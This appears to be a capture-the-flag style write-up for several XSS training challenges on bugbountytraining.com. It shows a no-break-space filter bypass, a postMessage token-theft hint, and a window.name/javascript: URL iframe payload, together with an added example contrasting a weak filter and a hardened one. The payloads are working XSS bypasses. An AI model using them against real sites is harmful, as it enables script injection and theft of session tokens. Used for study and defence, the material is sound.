Give some space to this XSS Filter

  • Check the page source, read the JS code, and understand how it works and how it filters the payload.

  • Try different payloads with a tag in the URI fragment (#).

  • On fileformat.info, search for "space" and pick the no-break space, which in UTF-8 is %C2%A0.

Now try -

onerror=%C2%A0a()

Since the above works (as confirmed in the page source), we can try:

#onerror=%C2%A0alert(document.domain)
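The no-break-space trick above works because a filter that only knows the ASCII space is checked against a JavaScript engine that skips U+00A0 like any other whitespace. The following is an added example, not the challenge's own filter code: it models such a weak filter, shows a check that normalises every JavaScript whitespace character before matching, and confirms the engine behaviour.

```javascript
// Added example (not from the challenge): NBSP (U+00A0, %C2%A0 in UTF-8) versus
// an ASCII-only attribute filter, and a check that normalises JS whitespace first.
const NBSP = "\u00A0";

// Whitespace the JavaScript engine skips between tokens (ES WhiteSpace and
// LineTerminator). The weak filter below only knows the ASCII space and tab.
const JS_WS = /[\t\n\v\f\r \u00A0\u1680\u2000-\u200A\u2028\u2029\u202F\u205F\u3000\uFEFF]+/g;

// Weak filter modelled on the challenge: rejects "on<name>=<identifier>" but
// allows only ASCII space/tab as padding after "=", so "onerror=<NBSP>alert(1)"
// slips through. Returns true when the value is allowed.
function weakFilter(value) {
  return !/on\w+=[ \t]*[A-Za-z_$]/i.test(value);
}

// Hardened check: percent-decode (rejecting malformed input), collapse every
// JS-whitespace run to one ASCII space, then match. %C2%A0 no longer hides the
// handler body from the pattern. Returns true when the value is allowed.
function hardenedFilter(value) {
  let decoded;
  try {
    decoded = decodeURIComponent(value);
  } catch (e) {
    return false; // malformed percent-encoding: fail closed
  }
  const normalised = decoded.replace(JS_WS, " ");
  return !/on\w+= ?[A-Za-z_$]/i.test(normalised);
}

// Shows that the engine really treats NBSP as whitespace: a function body of
// "<NBSP>return a()" parses and runs exactly like " return a()".
function nbspIsJsWhitespace() {
  const a = () => 42;
  return new Function("a", NBSP + "return a()")(a); // → 42
}
```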

Steal the token!

Use top.postMessage({uname:"test"}, "*")

This strict URL filter should prevent XSS, right?

solution: data:text/html,<iframe name="<svg onload=alert(document.domain)>" src=https://www.bugbountytraining.com/challenges/challenge-6.php?url=javascript:name>

explanation: When a javascript: URL is navigated to and the expression evaluates to a string, the browser writes that string onto the page, much like document.write. This is why some bookmarklets end with void(0): it stops the result from accidentally being a string.

Another thing to know is that the window.name property persists across navigation, and we control its value (here through the iframe's name attribute).

So we can set window.name to an HTML XSS payload, then navigate the frame to javascript:name so that the payload string is written onto the page.